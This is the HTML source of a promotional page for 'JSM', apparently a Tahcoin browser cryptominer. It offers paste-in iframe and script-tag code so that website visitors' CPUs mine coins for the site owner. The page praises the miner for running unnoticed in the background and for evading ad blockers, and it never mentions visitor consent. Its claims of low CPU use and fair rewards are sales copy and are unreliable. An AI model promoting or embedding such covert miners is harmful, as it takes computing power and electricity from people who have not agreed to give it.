-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
219 lines (182 loc) · 12 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="Free JavaScript miner to monetize your website traffic. Use our browser miner to earn money with your website traffic. Start earning today with our easy-to-integrate web miner!">
<meta name="keywords" content="JavaScript mining, browser mining, Tahcoin, cryptocurrency, web miner, earn money online, JavaScript cryptocurrency miner, web-based JavaScript mining solutions, in-browser JavaScript miner for Monero, coinimp JavaScript mining integration, CryptoNoter JavaScript miner setup, Monero web miner code examples, browser mining JavaScript libraries, JavaScript mining script for websites, open-source JavaScript mining projects">
<title>JSM - Javascript Miner, Javascript Web Miner</title>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
<style>
body {
background-color: #f8f9fa;
}
.hero {
background-color: #343a40;
color: white;
padding: 50px 0;
text-align: center;
}
.content {
padding: 20px;
}
.section {
margin-top: 30px;
padding: 20px;
background-color: #ffffff;
border-radius: 5px;
}
.stats {
background-color: #e9ecef;
padding: 20px;
border-radius: 5px;
margin-top: 20px;
}
#intro {
font-size: 49px;
padding: 19px;
}
</style>
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-dark">
<a class="navbar-brand" href="#">JSM</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarNav">
<ul class="navbar-nav">
<li class="nav-item active">
<a class="nav-link" href="#">Home</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://tahriver.online/wallet.php">Wallet</a>
</li>
<li class="nav-item">
<a class="nav-link" href="https://tahriver.online/key-generation.php">Create Wallet</a>
</li>
</ul>
</div>
</nav>
<div class="hero">
<h1>Welcome to JavaScript Mining</h1>
<p id="intro">Free JavaScript mining! Use our browser miner and earn money with your page traffic!</p>
</div>
<div class="content container">
<!-- Quick Start Section -->
<div class="section">
<h2>Quick Start: Start Mining the Right Way!</h2>
<p>Ready to dive into the exciting world of crypto mining? Let’s make it super easy and fun! With just a few simple steps, you can start earning TAHCOIN right away!</p>
<ol>
<li><strong>Add the iFrame:</strong> Place this magical code anywhere in your HTML page where you want to bring the mining action to life:</li>
<pre><code><iframe id="targetIframe" walletaddress="YOUR_WALLET_ADDRESS" src="https://tahriver.online/jsm.php" frameborder="0"></iframe></code></pre>
<p><em>Don't forget to replace "YOUR_WALLET_ADDRESS" with your actual wallet address. This is your ticket to the crypto party!</em></p>
<li><strong>Add JavaScript File:</strong> Now, let’s sprinkle some JavaScript magic! Include this script in the header or footer of your HTML document:</li>
<pre><code><script src="https://cdn.jsdelivr.net/gh/TAHCOINBLOCKCHAIN/Javascript-Miner@main/jsm.js"></script></code></pre>
<p>And done! You’re all set to start earning money!</p>
</ol>
<p>Get ready to watch those coins roll in as your visitors contribute their CPU power while enjoying your content. Happy mining!</p>
</div>
<!-- Why Choose Tahcoin Section -->
<div class="section">
<h2>Why Choose Tahcoin?</h2>
<ul>
<li><strong>Low CPU Consumption:</strong> Enjoy efficient mining without straining your system resources.</li>
<li><strong>No GPU Required:</strong> Mine TAHCOIN using just your CPU—perfect for everyday computers!</li>
<li><strong>Proof of Work:</strong> Engage in a secure and reliable mining process that rewards you fairly.</li>
<li><strong>Track Your Earnings:</strong> See how much TAHCOIN you've mined directly in your Blockchain <a href="https://tahriver.online/wallet.php">Wallet</a>.</li>
</ul>
</div>
<!-- How to Start Mining Section -->
<div class="section">
<h2>How to Start Mining</h2>
<p>Create an account and add the following code to your website:</p>
<pre><code><iframe id="targetIframe" walletaddress="YOUR_WALLET_ADDRESS" src="https://tahriver.online/jsm.php" frameborder="0"></iframe></code></pre>
<pre><code><script src="https://cdn.jsdelivr.net/gh/TAHCOINBLOCKCHAIN/Javascript-Miner@main/jsm.js"></script></code></pre>
<p>Just embed the code and start earning!</p>
</div>
<!-- User Statistics Section -->
<div class="stats">
<h3>User Statistics</h3>
<p id="totalWallets"><strong>Users:</strong> Loading...</p>
<p id="totalSupply"><strong>TAHCOIN Mined:</strong> Loading...</p>
<p id="currentWorth"><strong>Current Worth:</strong> Loading...</p>
<p><em>Note: Embedded miners are not tracked for privacy.</em></p>
</div>
<!-- Understanding JavaScript Mining Section -->
<div class="section">
<h2>Understanding JavaScript Mining (JSM)</h2>
<p>JavaScript mining is a revolutionary way to utilize your website's traffic for cryptocurrency generation. By embedding a simple JavaScript code, you can convert your visitors' CPU power into TAHCOIN, allowing you to earn without intrusive ads.</p>
<h3>Benefits of JSM:</h3>
<ul>
<li><strong>No Installation Required:</strong> Simply add a script to your site and start mining.</li>
<li><strong>User-Friendly:</strong> Visitors can engage with your content while contributing to mining.</li>
<li><strong>Ad Blocker Bypass:</strong> Unlike traditional ads, JavaScript miners are less likely to be blocked by ad blockers.</li>
<li><strong>Sustainable Revenue Stream:</strong> Generate income continuously as long as you have web traffic.</li>
</ul>
<h3>The Future of Web Mining</h3>
<p>The future of web mining lies in its ability to create a sustainable income model for website owners while respecting user privacy. As more users become aware of cryptocurrencies, integrating JSM into your site can position you ahead of the curve in digital monetization strategies.</p>
</div>
<!-- Create Your Tahcoin Wallet Section -->
<div class="section">
<h2>Create Your Tahcoin Wallet</h2>
<p>To start using Tahcoin effectively, you need to create a wallet. Follow these steps:</p>
<ol>
<li><strong>Generate Your Keys:</strong> Visit the key generation page to automatically generate your public key (wallet address) and seeds for wallet import. Make sure to save them securely.<br/>
[<a href="https://tahriver.online/key-generation.php">Key Generation Page</a>]</li>
<li><strong>Create Your Wallet:</strong> Use the generated public key and seeds to create your wallet.<br/>
[<a href="https://tahriver.online/wallet.php">Wallet Page</a>] for sending and receiving TAHCOIN.</li>
<li><strong>Copy Your Wallet Address:</strong> After generating your keys, copy the public key (wallet address) for use in mining and transactions.</li>
<li><strong>Start Using Your Wallet:</strong> You can now send and receive TAHCOIN securely!</li>
</ol>
<p><em>Please remember to keep your seeds confidential as they are essential for importing your wallet.</em></p>
</div>
<div class="section">
<h2>Display Advertising vs. JavaScript Mining: The Showdown!</h2>
<p>Let’s face it: traditional display ads can be annoying! They pop up, slow down your browsing, and often interrupt your experience. But what if there was a better way to monetize your website? Enter JavaScript mining—an innovative alternative that transforms how you earn from your visitors.</p>
<h3>Why Choose JavaScript Mining?</h3>
<ul>
<li><strong>Less Intrusive:</strong> Unlike display ads that can disrupt the user experience, JSM runs quietly in the background. Your visitors can enjoy your content without constant interruptions!</li>
<li><strong>Low CPU Consumption:</strong> JSM is designed to be efficient, requiring minimal CPU resources. Users won’t even notice it’s running, unlike some heavy display ads that can bog down their devices.</li>
<li><strong>No GPU Required:</strong> With JSM, there’s no need for powerful graphics cards. It works seamlessly on everyday computers, making it accessible for all users.</li>
<li><strong>Proof of Work:</strong> JSM operates on a transparent proof-of-work model, ensuring that users are rewarded fairly for their contributions without the complexities of ad impressions or clicks.</li>
<li><strong>Real-Time Earnings:</strong> Users can see how much they’ve mined directly in their Blockchain Wallets, providing immediate feedback and satisfaction—something traditional ads can’t offer!</li>
</ul>
<h3>The Downsides of Display Advertising</h3>
<ul>
<li><strong>Ad Blockers:</strong> Many users employ ad blockers to avoid intrusive ads, which means lost revenue for website owners.</li>
<li><strong>Performance Issues:</strong> Heavy display ads can slow down page load times and negatively impact user experience, leading to higher bounce rates.</li>
<li><strong>User Distrust:</strong> Users often feel bombarded by ads, leading to frustration and distrust towards websites that rely heavily on them.</li>
<li><strong>Limited Engagement:</strong> Ads may not engage users effectively, resulting in lower click-through rates compared to the seamless experience of JSM.</li>
</ul>
<p>While display advertising has been a staple of online monetization, JavaScript mining offers a fresh and effective alternative. By choosing JSM, you not only enhance user experience but also create a sustainable revenue stream without the drawbacks of traditional ads. So why not make the switch today and start mining?</p>
</div>
</div>
<script>
// Function to fetch Tahcoin data from your PHP script
async function fetchTahcoinData() {
try {
// Fetching combined data from the PHP script
const response = await fetch('fetch_tahcoin_data.php');
const data = await response.json();
// Extracting relevant values
const totalSupply = data.total_supply;
const currentWorth = data.current_worth; // Make sure this key matches your PHP output
const totalWallets = data.total_wallets; // New line to get total wallets
// Updating the UI with fetched data
document.getElementById('totalSupply').innerText = `TAHCOIN Mined: ${totalSupply} TAH`;
document.getElementById('currentWorth').innerText = `Current Worth: ${currentWorth} (approx.)`;
// Update total wallets in the UI
document.getElementById('totalWallets').innerHTML = `<p><strong>Users (Total Wallet):</strong> ${totalWallets}</p>`; // Update this line
} catch (error) {
console.error('Error fetching data:', error);
}
}
// Call the function to fetch and display data
fetchTahcoinData();
</script>
<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
</body>
</html>